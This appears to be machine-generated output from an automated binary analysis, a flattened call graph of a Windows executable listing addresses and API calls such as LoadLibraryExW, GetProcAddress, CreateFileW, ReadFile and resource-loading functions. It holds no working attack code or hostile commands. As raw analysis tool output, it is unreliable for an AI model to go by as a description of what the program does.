API calls 98145->98147 98149 feee67 GetOpenFileNameW 98146->98149 98148 fb7414 98147->98148 99140 fd09d5 98148->99140 98151 feeeb6 98149->98151 98152 fb7d2c 59 API calls 98151->98152 98154 feeecb 98152->98154 98154->98154 98156 fb7429 99158 fb69ca 98156->99158 98160 fc0a9a __ftell_nolock 98159->98160 99469 fb6ee0 98160->99469 98162 fc0a9f 98163 fb3c26 98162->98163 99480 fc12fe 89 API calls 98162->99480 98163->98021 98163->98029 98262->98021 98274 fb3d50 __ftell_nolock 98273->98274 98275 fb7d2c 59 API calls 98274->98275 98286 fb3eb6 Mailbox 98274->98286 98277 fb3d82 98275->98277 98280 fb3db8 Mailbox 98277->98280 98399 fb7b52 98277->98399 98278 fb7b52 59 API calls 98278->98280 98279 fb3e89 98281 fb7f41 59 API calls 98279->98281 98279->98286 98280->98278 98280->98279 98282 fb7f41 59 API calls 98280->98282 98285 fb3f84 59 API calls 98280->98285 98280->98286 98283 fb3eaa 98281->98283 98282->98280 98284 fb3f84 59 API calls 98283->98284 98284->98286 98285->98280 98286->98066 98402 fb4d13 98287->98402 98292 fedd0f 98295 fb4faa 84 API calls 98292->98295 98293 fb4f68 LoadLibraryExW 98412 fb4cc8 98293->98412 98296 fedd16 98295->98296 98298 fb4cc8 3 API calls 98296->98298 98300 fedd1e 98298->98300 98438 fb506b 98300->98438 98301 fb4f8f 98301->98300 98302 fb4f9b 98301->98302 98304 fb4faa 84 API calls 98302->98304 98306 fb37e6 98304->98306 98306->98073 98306->98074 98308 fedd45 98446 fb5027 98308->98446 98310 fedd52 98312 fb3801 98311->98312 98313 fb81b2 98311->98313 98315 fb93ea 98312->98315 98873 fb80d7 59 API calls 2 library calls 98313->98873 98316 fd0ff6 Mailbox 59 API calls 98315->98316 98317 fb380d 98316->98317 98317->98087 98319 fb862b 98318->98319 98320 fb8652 98319->98320 98874 fb8b13 69 API calls Mailbox 98319->98874 98320->98091 98323 fb3eec 98322->98323 98324 fb3f05 98322->98324 98325 fb81a7 59 API calls 98323->98325 98326 fb7d2c 59 API calls 98324->98326 98327 fb388b 98325->98327 98326->98327 98328 fd313d 98327->98328 98329 fd31be 98328->98329 98330 fd3149 98328->98330 98877 fd31d0 60 API calls 3 library calls 98329->98877 98337 fd316e 98330->98337 98875 fd8d68 58 API calls __getptd_noexit 98330->98875 98333 fd31cb 98333->98112 98334 fd3155 98876 fd8ff6 9 API calls _W_expandtime 98334->98876 98336 fd3160 98336->98112 98337->98112 98339 fb9436 98338->98339 98340 fd0ff6 Mailbox 59 API calls 98339->98340 98341 fb9444 98340->98341 98342 fb3936 98341->98342 98878 fb935c 59 API calls Mailbox 98341->98878 98344 fb91b0 98342->98344 98879 fb92c0 98344->98879 98346 fb91bf 98347 fd0ff6 Mailbox 59 API calls 98346->98347 98348 fb3944 98346->98348 98347->98348 98349 fb9040 98348->98349 98350 fef5a5 98349->98350 98352 fb9057 98349->98352 98350->98352 98889 fb8d3b 59 API calls Mailbox 98350->98889 98353 fb9158 98352->98353 98354 fb91a0 98352->98354 98357 fb915f 98352->98357 98356 fd0ff6 Mailbox 59 API calls 98353->98356 98888 fb9e9c 60 API calls Mailbox 98354->98888 98356->98357 98357->98140 98359 fb5045 85 API calls 98358->98359 98360 1019854 98359->98360 98890 10199be 98360->98890 98363 fb506b 74 API calls 98364 1019881 98363->98364 98365 fb506b 74 API calls 98364->98365 98366 1019891 98365->98366 98367 fb506b 74 API calls 98366->98367 98368 10198ac 98367->98368 98369 fb506b 74 API calls 98368->98369 98370 10198c7 98369->98370 98371 fb5045 85 API calls 98370->98371 98372 10198de 98371->98372 98373 fd594c __crtLCMapStringA_stat 58 API calls 98372->98373 98374 10198e5 98373->98374 98375 fd594c __crtLCMapStringA_stat 58 API calls 98374->98375 98376 10198ef 98375->98376 98377 fb506b 74 API calls 98376->98377 98378 1019903 98377->98378 98379 1019393 GetSystemTimeAsFileTime 98378->98379 98380 1019916 98379->98380 98381 1019940 98380->98381 98382 101992b 98380->98382 98383 10199a5 98381->98383 98384 1019946 98381->98384 98385 fd2f95 _free 58 API calls 98382->98385 98387 fd2f95 _free 58 API calls 98383->98387 98896 1018d90 98384->98896 98388 1019931 98385->98388 98390 fed3c1 98387->98390 98391 fd2f95 _free 58 API calls 98388->98391 98390->98078 98393 fb4faa 98390->98393 98391->98390 98392 fd2f95 _free 58 API calls 98392->98390 98394 fb4fbb 98393->98394 98395 fb4fb4 98393->98395 98397 fb4fdb FreeLibrary 98394->98397 98398 fb4fca 98394->98398 98396 fd55d6 __fcloseall 83 API calls 98395->98396 98396->98394 98397->98398 98398->98078 98400 fb7faf 59 API calls 98399->98400 98401 fb7b5d 98400->98401 98401->98277 98451 fb4d61 98402->98451 98405 fb4d3a 98407 fb4d4a FreeLibrary 98405->98407 98408 fb4d53 98405->98408 98406 fb4d61 2 API calls 98406->98405 98407->98408 98409 fd548b 98408->98409 98455 fd54a0 98409->98455 98411 fb4f5c 98411->98292 98411->98293 98613 fb4d94 98412->98613 98415 fb4d94 2 API calls 98418 fb4ced 98415->98418 98416 fb4d08 98419 fb4dd0 98416->98419 98417 fb4cff FreeLibrary 98417->98416 98418->98416 98418->98417 98420 fd0ff6 Mailbox 59 API calls 98419->98420 98421 fb4de5 98420->98421 98422 fb538e 59 API calls 98421->98422 98423 fb4df1 _memmove 98422->98423 98424 fb4e2c 98423->98424 98425 fb4ee9 98423->98425 98426 fb4f21 98423->98426 98427 fb5027 69 API calls 98424->98427 98617 fb4fe9 CreateStreamOnHGlobal 98425->98617 98628 1019ba5 95 API calls 98426->98628 98435 fb4e35 98427->98435 98430 fb506b 74 API calls 98430->98435 98432 fb4ec9 98432->98301 98433 fedcd0 98434 fb5045 85 API calls 98433->98434 98436 fedce4 98434->98436 98435->98430 98435->98432 98435->98433 98623 fb5045 98435->98623 98437 fb506b 74 API calls 98436->98437 98437->98432 98439 fb507d 98438->98439 98440 feddf6 98438->98440 98652 fd5812 98439->98652 98443 1019393 98850 10191e9 98443->98850 98445 10193a9 98445->98308 98447 feddb9 98446->98447 98448 fb5036 98446->98448 98855 fd5e90 98448->98855 98450 fb503e 98450->98310 98452 fb4d2e 98451->98452 98453 fb4d6a LoadLibraryA 98451->98453 98452->98405 98452->98406 98453->98452 98454 fb4d7b GetProcAddress 98453->98454 98454->98452 98458 fd54ac __alloc_osfhnd 98455->98458 98456 fd54bf 98504 fd8d68 58 API calls __getptd_noexit 98456->98504 98458->98456 98460 fd54f0 98458->98460 98459 fd54c4 98505 fd8ff6 9 API calls _W_expandtime 98459->98505 98474 fe0738 98460->98474 98463 fd54f5 98464 fd54fe 98463->98464 98465 fd550b 98463->98465 98506 fd8d68 58 API calls __getptd_noexit 98464->98506 98467 fd5535 98465->98467 98468 fd5515 98465->98468 98489 fe0857 98467->98489 98507 fd8d68 58 API calls __getptd_noexit 98468->98507 98471 fd54cf __alloc_osfhnd @_EH4_CallFilterFunc@8 98471->98411 98475 fe0744 __alloc_osfhnd 98474->98475 98476 fd9e4b __lock 58 API calls 98475->98476 98487 fe0752 98476->98487 98477 fe07c6 98509 fe084e 98477->98509 98478 fe07cd 98514 fd8a5d 58 API calls 2 library calls 98478->98514 98481 fe0843 __alloc_osfhnd 98481->98463 98482 fe07d4 98482->98477 98515 fda06b InitializeCriticalSectionAndSpinCount 98482->98515 98485 fd9ed3 __mtinitlocknum 58 API calls 98485->98487 98486 fe07fa EnterCriticalSection 98486->98477 98487->98477 98487->98478 98487->98485 98512 fd6e8d 59 API calls __lock 98487->98512 98513 fd6ef7 LeaveCriticalSection LeaveCriticalSection _doexit 98487->98513 98498 fe0877 __wopenfile 98489->98498 98490 fe0891 98520 fd8d68 58 API calls __getptd_noexit 98490->98520 98491 fe0a4c 98491->98490 98496 fe0aaf 98491->98496 98493 fe0896 98521 fd8ff6 9 API calls _W_expandtime 98493->98521 98495 fd5540 98508 fd5562 LeaveCriticalSection LeaveCriticalSection __wfsopen 98495->98508 98517 fe87f1 98496->98517 98498->98490 98498->98491 98522 fd3a0b 60 API calls 2 library calls 98498->98522 98500 fe0a45 98500->98491 98523 fd3a0b 60 API calls 2 library calls 98500->98523 98502 fe0a64 98502->98491 98524 fd3a0b 60 API calls 2 library calls 98502->98524 98504->98459 98505->98471 98506->98471 98507->98471 98508->98471 98516 fd9fb5 LeaveCriticalSection 98509->98516 98511 fe0855 98511->98481 98512->98487 98513->98487 98514->98482 98515->98486 98516->98511 98525 fe7fd5 98517->98525 98519 fe880a 98519->98495 98520->98493 98521->98495 98522->98500 98523->98502 98524->98491 98527 fe7fe1 __alloc_osfhnd 98525->98527 98526 fe7ff7 98610 fd8d68 58 API calls __getptd_noexit 98526->98610 98527->98526 98529 fe802d 98527->98529 98536 fe809e 98529->98536 98530 fe7ffc 98611 fd8ff6 9 API calls _W_expandtime 98530->98611 98533 fe8049 98612 fe8072 LeaveCriticalSection __unlock_fhandle 98533->98612 98535 fe8006 __alloc_osfhnd 98535->98519 98537 fe80be 98536->98537 98538 fd471a __wsopen_nolock 58 API calls 98537->98538 98540 fe80da 98538->98540 98539 fd9006 __invoke_watson 8 API calls 98541 fe87f0 98539->98541 98542 fe8114 98540->98542 98550 fe8137 98540->98550 98584 fe8211 98540->98584 98543 fe7fd5 __wsopen_helper 103 API calls 98541->98543 98544 fd8d34 __chsize_nolock 58 API calls 98542->98544 98545 fe880a 98543->98545 98546 fe8119 98544->98546 98545->98533 98547 fd8d68 _W_expandtime 58 API calls 98546->98547 98548 fe8126 98547->98548 98551 fd8ff6 _W_expandtime 9 API calls 98548->98551 98549 fe81f5 98552 fd8d34 __chsize_nolock 58 API calls 98549->98552 98550->98549 98556 fe81d3 98550->98556 98577 fe8130 98551->98577 98553 fe81fa 98552->98553 98554 fd8d68 _W_expandtime 58 API calls 98553->98554 98555 fe8207 98554->98555 98557 fd8ff6 _W_expandtime 9 API calls 98555->98557 98558 fdd4d4 __alloc_osfhnd 61 API calls 98556->98558 98557->98584 98559 fe82a1 98558->98559 98560 fe82ce 98559->98560 98561 fe82ab 98559->98561 98563 fe7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98560->98563 98562 fd8d34 __chsize_nolock 58 API calls 98561->98562 98564 fe82b0 98562->98564 98571 fe82f0 98563->98571 98565 fd8d68 _W_expandtime 58 API calls 98564->98565 98567 fe82ba 98565->98567 98566 fe836e GetFileType 98568 fe83bb 98566->98568 98569 fe8379 GetLastError 98566->98569 98573 fd8d68 _W_expandtime 58 API calls 98567->98573 98580 fdd76a __set_osfhnd 59 API calls 98568->98580 98574 fd8d47 __dosmaperr 58 API calls 98569->98574 98570 fe833c GetLastError 98572 fd8d47 __dosmaperr 58 API calls 98570->98572 98571->98566 98571->98570 98575 fe7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98571->98575 98576 fe8361 98572->98576 98573->98577 98578 fe83a0 CloseHandle 98574->98578 98579 fe8331 98575->98579 98582 fd8d68 _W_expandtime 58 API calls 98576->98582 98577->98533 98578->98576 98581 fe83ae 98578->98581 98579->98566 98579->98570 98587 fe83d9 98580->98587 98583 fd8d68 _W_expandtime 58 API calls 98581->98583 98582->98584 98585 fe83b3 98583->98585 98584->98539 98585->98576 98586 fe8594 98586->98584 98589 fe8767 CloseHandle 98586->98589 98587->98586 98588 fe1b11 __lseeki64_nolock 60 API calls 98587->98588 98606 fe845a 98587->98606 98590 fe8443 98588->98590 98591 fe7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98589->98591 98594 fd8d34 __chsize_nolock 58 API calls 98590->98594 98590->98606 98593 fe878e 98591->98593 98592 fe10ab 70 API calls __read_nolock 98592->98606 98595 fe87c2 98593->98595 98596 fe8796 GetLastError 98593->98596 98594->98606 98595->98584 98597 fd8d47 __dosmaperr 58 API calls 98596->98597 98600 fe87a2 98597->98600 98598 fe0d2d __close_nolock 61 API calls 98598->98606 98599 fe848c 98601 fe99f2 __chsize_nolock 82 API calls 98599->98601 98599->98606 98602 fdd67d __free_osfhnd 59 API calls 98600->98602 98601->98599 98602->98595 98603 fddac6 __write 78 API calls 98603->98606 98604 fe8611 98605 fe0d2d __close_nolock 61 API calls 98604->98605 98607 fe8618 98605->98607 98606->98586 98606->98592 98606->98598 98606->98599 98606->98603 98606->98604 98608 fe1b11 60 API calls __lseeki64_nolock 98606->98608 98609 fd8d68 _W_expandtime 58 API calls 98607->98609 98608->98606 98609->98584 98610->98530 98611->98535 98612->98535 98614 fb4ce1 98613->98614 98615 fb4d9d LoadLibraryA 98613->98615 98614->98415 98614->98418 98615->98614 98616 fb4dae GetProcAddress 98615->98616 98616->98614 98618 fb5003 FindResourceExW 98617->98618 98622 fb5020 98617->98622 98619 fedd5c LoadResource 98618->98619 98618->98622 98620 fedd71 SizeofResource 98619->98620 98619->98622 98621 fedd85 LockResource 98620->98621 98620->98622 98621->98622 98622->98424 98624 fb5054 98623->98624 98627 feddd4 98623->98627 98629 fd5a7d 98624->98629 98626 fb5062 98626->98435 98628->98424 98630 fd5a89 __alloc_osfhnd 98629->98630 98631 fd5a9b 98630->98631 98633 fd5ac1 98630->98633 98642 fd8d68 58 API calls __getptd_noexit 98631->98642 98644 fd6e4e 98633->98644 98635 fd5aa0 98643 fd8ff6 9 API calls _W_expandtime 98635->98643 98636 fd5ac7 98650 fd59ee 83 API calls 5 library calls 98636->98650 98639 fd5ad6 98651 fd5af8 LeaveCriticalSection LeaveCriticalSection __wfsopen 98639->98651 98641 fd5aab __alloc_osfhnd 98641->98626 98642->98635 98643->98641 98645 fd6e5e 98644->98645 98646 fd6e80 EnterCriticalSection 98644->98646 98645->98646 98647 fd6e66 98645->98647 98648 fd6e76 98646->98648 98649 fd9e4b __lock 58 API calls 98647->98649 98648->98636 98649->98648 98650->98639 98651->98641 98655 fd582d 98652->98655 98654 fb508e 98654->98443 98656 fd5839 __alloc_osfhnd 98655->98656 98657 fd587c 98656->98657 98658 fd584f _memset 98656->98658 98659 fd5874 __alloc_osfhnd 98656->98659 98660 fd6e4e __lock_file 59 API calls 98657->98660 98682 fd8d68 58 API calls __getptd_noexit 98658->98682 98659->98654 98662 fd5882 98660->98662 98668 fd564d 98662->98668 98663 fd5869 98683 fd8ff6 9 API calls _W_expandtime 98663->98683 98669 fd5683 98668->98669 98671 fd5668 _memset 98668->98671 98684 fd58b6 LeaveCriticalSection LeaveCriticalSection __wfsopen 98669->98684 98670 fd5673 98780 fd8d68 58 API calls __getptd_noexit 98670->98780 98671->98669 98671->98670 98676 fd56c3 98671->98676 98673 fd5678 98781 fd8ff6 9 API calls _W_expandtime 98673->98781 98676->98669 98677 fd57d4 _memset 98676->98677 98685 fd4916 98676->98685 98692 fe10ab 98676->98692 98760 fe0df7 98676->98760 98782 fe0f18 58 API calls 3 library calls 98676->98782 98783 fd8d68 58 API calls __getptd_noexit 98677->98783 98682->98663 98683->98659 98684->98659 98686 fd4935 98685->98686 98687 fd4920 98685->98687 98686->98676 98784 fd8d68 58 API calls __getptd_noexit 98687->98784 98689 fd4925 98785 fd8ff6 9 API calls _W_expandtime 98689->98785 98691 fd4930 98691->98676 98693 fe10cc 98692->98693 98694 fe10e3 98692->98694 98795 fd8d34 58 API calls __getptd_noexit 98693->98795 98696 fe181b 98694->98696 98700 fe111d 98694->98700 98811 fd8d34 58 API calls __getptd_noexit 98696->98811 98697 fe10d1 98796 fd8d68 58 API calls __getptd_noexit 98697->98796 98703 fe1125 98700->98703 98709 fe113c 98700->98709 98701 fe1820 98812 fd8d68 58 API calls __getptd_noexit 98701->98812 98797 fd8d34 58 API calls __getptd_noexit 98703->98797 98704 fe1131 98813 fd8ff6 9 API calls _W_expandtime 98704->98813 98705 fe10d8 98705->98676 98707 fe112a 98798 fd8d68 58 API calls __getptd_noexit 98707->98798 98709->98705 98710 fe1151 98709->98710 98712 fe116b 98709->98712 98714 fe1189 98709->98714 98799 fd8d34 58 API calls __getptd_noexit 98710->98799 98712->98710 98718 fe1176 98712->98718 98800 fd8a5d 58 API calls 2 library calls 98714->98800 98716 fe1199 98719 fe11bc 98716->98719 98720 fe11a1 98716->98720 98786 fe5ebb 98718->98786 98803 fe1b11 60 API calls 3 library calls 98719->98803 98801 fd8d68 58 API calls __getptd_noexit 98720->98801 98721 fe128a 98723 fe1303 ReadFile 98721->98723 98728 fe12a0 GetConsoleMode 98721->98728 98726 fe1325 98723->98726 98727 fe17e3 GetLastError 98723->98727 98725 fe11a6 98802 fd8d34 58 API calls __getptd_noexit 98725->98802 98726->98727 98734 fe12f5 98726->98734 98730 fe12e3 98727->98730 98731 fe17f0 98727->98731 98732 fe12b4 98728->98732 98733 fe1300 98728->98733 98742 fe12e9 98730->98742 98804 fd8d47 58 API calls 3 library calls 98730->98804 98809 fd8d68 58 API calls __getptd_noexit 98731->98809 98732->98733 98736 fe12ba ReadConsoleW 98732->98736 98733->98723 98734->98742 98744 fe135a 98734->98744 98747 fe15c7 98734->98747 98736->98734 98738 fe12dd GetLastError 98736->98738 98737 fe17f5 98810 fd8d34 58 API calls __getptd_noexit 98737->98810 98738->98730 98741 fd2f95 _free 58 API calls 98741->98705 98742->98705 98742->98741 98745 fe13c6 ReadFile 98744->98745 98751 fe1447 98744->98751 98748 fe13e7 GetLastError 98745->98748 98758 fe13f1 98745->98758 98746 fe16cd ReadFile 98753 fe16f0 GetLastError 98746->98753 98759 fe16fe 98746->98759 98747->98742 98747->98746 98748->98758 98749 fe1504 98754 fe14b4 MultiByteToWideChar 98749->98754 98807 fe1b11 60 API calls 3 library calls 98749->98807 98750 fe14f4 98806 fd8d68 58 API calls __getptd_noexit 98750->98806 98751->98742 98751->98749 98751->98750 98751->98754 98753->98759 98754->98738 98754->98742 98758->98744 98805 fe1b11 60 API calls 3 library calls 98758->98805 98759->98747 98808 fe1b11 60 API calls 3 library calls 98759->98808 98761 fe0e02 98760->98761 98764 fe0e17 98760->98764 98847 fd8d68 58 API calls __getptd_noexit 98761->98847 98763 fe0e07 98848 fd8ff6 9 API calls _W_expandtime 98763->98848 98766 fe0e4c 98764->98766 98772 fe0e12 98764->98772 98849 fe6234 58 API calls __malloc_crt 98764->98849 98768 fd4916 __fputwc_nolock 58 API calls 98766->98768 98769 fe0e60 98768->98769 98814 fe0f97 98769->98814 98771 fe0e67 98771->98772 98773 fd4916 __fputwc_nolock 58 API calls 98771->98773 98772->98676 98774 fe0e8a 98773->98774 98774->98772 98775 fd4916 __fputwc_nolock 58 API calls 98774->98775 98776 fe0e96 98775->98776 98776->98772 98777 fd4916 __fputwc_nolock 58 API calls 98776->98777 98778 fe0ea3 98777->98778 98779 fd4916 __fputwc_nolock 58 API calls 98778->98779 98779->98772 98780->98673 98781->98669 98782->98676 98783->98673 98784->98689 98785->98691 98787 fe5ec6 98786->98787 98788 fe5ed3 98786->98788 98789 fd8d68 _W_expandtime 58 API calls 98787->98789 98791 fe5edf 98788->98791 98792 fd8d68 _W_expandtime 58 API calls 98788->98792 98790 fe5ecb 98789->98790 98790->98721 98791->98721 98793 fe5f00 98792->98793 98794 fd8ff6 _W_expandtime 9 API calls 98793->98794 98794->98790 98795->98697 98796->98705 98797->98707 98798->98704 98799->98707 98800->98716 98801->98725 98802->98705 98803->98718 98804->98742 98805->98758 98806->98742 98807->98754 98808->98759 98809->98737 98810->98742 98811->98701 98812->98704 98813->98705 98815 fe0fa3 __alloc_osfhnd 98814->98815 98816 fe0fc7 98815->98816 98817 fe0fb0 98815->98817 98818 fe108b 98816->98818 98820 fe0fdb 98816->98820 98819 fd8d34 __chsize_nolock 58 API calls 98817->98819 98821 fd8d34 __chsize_nolock 58 API calls 98818->98821 98822 fe0fb5 98819->98822 98824 fe0ff9 98820->98824 98825 fe1006 98820->98825 98826 fe0ffe 98821->98826 98823 fd8d68 _W_expandtime 58 API calls 98822->98823 98838 fe0fbc __alloc_osfhnd 98823->98838 98827 fd8d34 __chsize_nolock 58 API calls 98824->98827 98828 fe1028 98825->98828 98829 fe1013 98825->98829 98830 fd8d68 _W_expandtime 58 API calls 98826->98830 98827->98826 98832 fdd446 ___lock_fhandle 59 API calls 98828->98832 98831 fd8d34 __chsize_nolock 58 API calls 98829->98831 98834 fe1020 98830->98834 98835 fe1018 98831->98835 98833 fe102e 98832->98833 98836 fe1054 98833->98836 98837 fe1041 98833->98837 98841 fd8ff6 _W_expandtime 9 API calls 98834->98841 98839 fd8d68 _W_expandtime 58 API calls 98835->98839 98842 fd8d68 _W_expandtime 58 API calls 98836->98842 98840 fe10ab __read_nolock 70 API calls 98837->98840 98838->98771 98839->98834 98843 fe104d 98840->98843 98841->98838 98844 fe1059 98842->98844 98846 fe1083 __read LeaveCriticalSection 98843->98846 98845 fd8d34 __chsize_nolock 58 API calls 98844->98845 98845->98843 98846->98838 98847->98763 98848->98772 98849->98766 98853 fd543a GetSystemTimeAsFileTime 98850->98853 98852 10191f8 98852->98445 98854 fd5468 __aulldiv 98853->98854 98854->98852 98856 fd5e9c __alloc_osfhnd 98855->98856 98857 fd5eae 98856->98857 98858 fd5ec3 98856->98858 98869 fd8d68 58 API calls __getptd_noexit 98857->98869 98860 fd6e4e __lock_file 59 API calls 98858->98860 98862 fd5ec9 98860->98862 98861 fd5eb3 98870 fd8ff6 9 API calls _W_expandtime 98861->98870 98871 fd5b00 67 API calls 5 library calls 98862->98871 98865 fd5ed4 98872 fd5ef4 LeaveCriticalSection LeaveCriticalSection __wfsopen 98865->98872 98866 fd5ebe __alloc_osfhnd 98866->98450 98868 fd5ee6 98868->98866 98869->98861 98870->98866 98871->98865 98872->98868 98873->98312 98874->98320 98875->98334 98876->98336 98877->98333 98878->98342 98880 fb92c9 Mailbox 98879->98880 98881 fef5c8 98880->98881 98886 fb92d3 98880->98886 98882 fd0ff6 Mailbox 59 API calls 98881->98882 98884 fef5d4 98882->98884 98883 fb92da 98883->98346 98886->98883 98887 fb9df0 59 API calls Mailbox 98886->98887 98887->98886 98888->98357 98889->98352 98895 10199d2 __tzset_nolock _wcscmp 98890->98895 98891 1019866 98891->98363 98891->98390 98892 fb506b 74 API calls 98892->98895 98893 1019393 GetSystemTimeAsFileTime 98893->98895 98894 fb5045 85 API calls 98894->98895 98895->98891 98895->98892 98895->98893 98895->98894 98897 1018d9b 98896->98897 98898 1018da9 98896->98898 98899 fd548b 115 API calls 98897->98899 98900 1018dee 98898->98900 98901 fd548b 115 API calls 98898->98901 98926 1018db2 98898->98926 98899->98898 98927 101901b 98900->98927 98903 1018dd3 98901->98903 98903->98900 98905 1018ddc 98903->98905 98904 1018e32 98906 1018e57 98904->98906 98907 1018e36 98904->98907 98908 fd55d6 __fcloseall 83 API calls 98905->98908 98905->98926 98931 1018c33 98906->98931 98911 fd55d6 __fcloseall 83 API calls 98907->98911 98912 1018e43 98907->98912 98908->98926 98911->98912 98915 fd55d6 __fcloseall 83 API calls 98912->98915 98912->98926 98913 1018e85 98940 1018eb5 98913->98940 98914 1018e65 98916 1018e72 98914->98916 98918 fd55d6 __fcloseall 83 API calls 98914->98918 98915->98926 98920 fd55d6 __fcloseall 83 API calls 98916->98920 98916->98926 98918->98916 98920->98926 98923 1018ea0 98925 fd55d6 __fcloseall 83 API calls 98923->98925 98923->98926 98925->98926 98926->98392 98928 1019040 98927->98928 98930 1019029 __tzset_nolock _memmove 98927->98930 98929 fd5812 __fread_nolock 74 API calls 98928->98929 98929->98930 98930->98904 98932 fd594c __crtLCMapStringA_stat 58 API calls 98931->98932 98933 1018c42 98932->98933 98934 fd594c __crtLCMapStringA_stat 58 API calls 98933->98934 98935 1018c56 98934->98935 98936 fd594c __crtLCMapStringA_stat 58 API calls 98935->98936 98937 1018c6a 98936->98937 98938 1018f97 58 API calls 98937->98938 98939 1018c7d 98937->98939 98938->98939 98939->98913 98939->98914 98947 1018eca 98940->98947 98941 1018f82 98969 10191bf 98941->98969 98943 1018c8f 74 API calls 98943->98947 98944 1018e8c 98948 1018f97 98944->98948 98947->98941 98947->98943 98947->98944 98973 1018d2b 74 API calls 98947->98973 98974 101909c 80 API calls 98947->98974 98949 1018fa4 98948->98949 98950 1018faa 98948->98950 98952 fd2f95 _free 58 API calls 98949->98952 98951 1018fbb 98950->98951 98953 fd2f95 _free 58 API calls 98950->98953 98954 1018e93 98951->98954 98955 fd2f95 _free 58 API calls 98951->98955 98952->98950 98953->98951 98954->98923 98956 fd55d6 98954->98956 98955->98954 98957 fd55e2 __alloc_osfhnd 98956->98957 98958 fd560e 98957->98958 98959 fd55f6 98957->98959 98961 fd6e4e __lock_file 59 API calls 98958->98961 98965 fd5606 __alloc_osfhnd 98958->98965 99056 fd8d68 58 API calls __getptd_noexit 98959->99056 98964 fd5620 98961->98964 98962 fd55fb 99057 fd8ff6 9 API calls _W_expandtime 98962->99057 99040 fd556a 98964->99040 98965->98923 98970 10191dd 98969->98970 98971 10191cc 98969->98971 98970->98944 98975 fd4a93 98971->98975 98973->98947 98974->98947 98976 fd4a9f __alloc_osfhnd 98975->98976 98977 fd4abd 98976->98977 98978 fd4ad5 98976->98978 98980 fd4acd __alloc_osfhnd 98976->98980 99000 fd8d68 58 API calls __getptd_noexit 98977->99000 98981 fd6e4e __lock_file 59 API calls 98978->98981 98980->98970 98983 fd4adb 98981->98983 98982 fd4ac2 99001 fd8ff6 9 API calls _W_expandtime 98982->99001 98988 fd493a 98983->98988 98990 fd4949 98988->98990 98995 fd4967 98988->98995 98989 fd4957 99031 fd8d68 58 API calls __getptd_noexit 98989->99031 98990->98989 98990->98995 98998 fd4981 _memmove 98990->98998 98992 fd495c 99032 fd8ff6 9 API calls _W_expandtime 98992->99032 99002 fd4b0d LeaveCriticalSection LeaveCriticalSection __wfsopen 98995->99002 98997 fd4916 __fputwc_nolock 58 API calls 98997->98998 98998->98995 98998->98997 99003 fddac6 98998->99003 99033 fd4c6d 98998->99033 99039 fdb05e 78 API calls 6 library calls 98998->99039 99000->98982 99001->98980 99002->98980 99004 fddad2 __alloc_osfhnd 99003->99004 99005 fddadf 99004->99005 99006 fddaf6 99004->99006 99008 fd8d34 __chsize_nolock 58 API calls 99005->99008 99007 fddb95 99006->99007 99010 fddb0a 99006->99010 99011 fd8d34 __chsize_nolock 58 API calls 99007->99011 99009 fddae4 99008->99009 99012 fd8d68 _W_expandtime 58 API calls 99009->99012 99013 fddb28 99010->99013 99014 fddb32 99010->99014 99015 fddb2d 99011->99015 99024 fddaeb __alloc_osfhnd 99012->99024 99016 fd8d34 __chsize_nolock 58 API calls 99013->99016 99017 fdd446 ___lock_fhandle 59 API calls 99014->99017 99019 fd8d68 _W_expandtime 58 API calls 99015->99019 99016->99015 99018 fddb38 99017->99018 99020 fddb5e 99018->99020 99021 fddb4b 99018->99021 99022 fddba1 99019->99022 99023 fd8d68 _W_expandtime 58 API calls 99020->99023 99025 fddbb5 __write_nolock 76 API calls 99021->99025 99026 fd8ff6 _W_expandtime 9 API calls 99022->99026 99027 fddb63 99023->99027 99024->98998 99028 fddb57 99025->99028 99026->99024 99029 fd8d34 __chsize_nolock 58 API calls 99027->99029 99030 fddb8d __write LeaveCriticalSection 99028->99030 99029->99028 99030->99024 99031->98992 99032->98995 99034 fd4c80 99033->99034 99035 fd4ca4 99033->99035 99034->99035 99036 fd4916 __fputwc_nolock 58 API calls 99034->99036 99035->98998 99037 fd4c9d 99036->99037 99038 fddac6 __write 78 API calls 99037->99038 99038->99035 99039->98998 99041 fd558d 99040->99041 99042 fd5579 99040->99042 99044 fd5589 99041->99044 99046 fd4c6d __flush 78 API calls 99041->99046 99089 fd8d68 58 API calls __getptd_noexit 99042->99089 99058 fd5645 LeaveCriticalSection LeaveCriticalSection __wfsopen 99044->99058 99045 fd557e 99090 fd8ff6 9 API calls _W_expandtime 99045->99090 99047 fd5599 99046->99047 99059 fe0dc7 99047->99059 99051 fd4916 __fputwc_nolock 58 API calls 99052 fd55a7 99051->99052 99063 fe0c52 99052->99063 99054 fd55ad 99054->99044 99055 fd2f95 _free 58 API calls 99054->99055 99055->99044 99056->98962 99057->98965 99058->98965 99060 fd55a1 99059->99060 99061 fe0dd4 99059->99061 99060->99051 99061->99060 99062 fd2f95 _free 58 API calls 99061->99062 99062->99060 99064 fe0c5e __alloc_osfhnd 99063->99064 99065 fe0c6b 99064->99065 99066 fe0c82 99064->99066 99115 fd8d34 58 API calls __getptd_noexit 99065->99115 99068 fe0d0d 99066->99068 99070 fe0c92 99066->99070 99120 fd8d34 58 API calls __getptd_noexit 99068->99120 99069 fe0c70 99116 fd8d68 58 API calls __getptd_noexit 99069->99116 99073 fe0cba 99070->99073 99074 fe0cb0 99070->99074 99091 fdd446 99073->99091 99117 fd8d34 58 API calls __getptd_noexit 99074->99117 99075 fe0cb5 99121 fd8d68 58 API calls __getptd_noexit 99075->99121 99079 fe0cc0 99080 fe0cde 99079->99080 99081 fe0cd3 99079->99081 99118 fd8d68 58 API calls __getptd_noexit 99080->99118 99100 fe0d2d 99081->99100 99082 fe0d19 99122 fd8ff6 9 API calls _W_expandtime 99082->99122 99084 fe0c77 __alloc_osfhnd 99084->99054 99087 fe0cd9 99119 fe0d05 LeaveCriticalSection __unlock_fhandle 99087->99119 99089->99045 99090->99044 99092 fdd452 __alloc_osfhnd 99091->99092 99093 fdd4a1 EnterCriticalSection 99092->99093 99095 fd9e4b __lock 58 API calls 99092->99095 99094 fdd4c7 __alloc_osfhnd 99093->99094 99094->99079 99096 fdd477 99095->99096 99099 fdd48f 99096->99099 99123 fda06b InitializeCriticalSectionAndSpinCount 99096->99123 99124 fdd4cb LeaveCriticalSection _doexit 99099->99124 99125 fdd703 99100->99125 99102 fe0d91 99138 fdd67d 59 API calls 2 library calls 99102->99138 99103 fe0d3b 99103->99102 99105 fe0d6f 99103->99105 99107 fdd703 __chsize_nolock 58 API calls 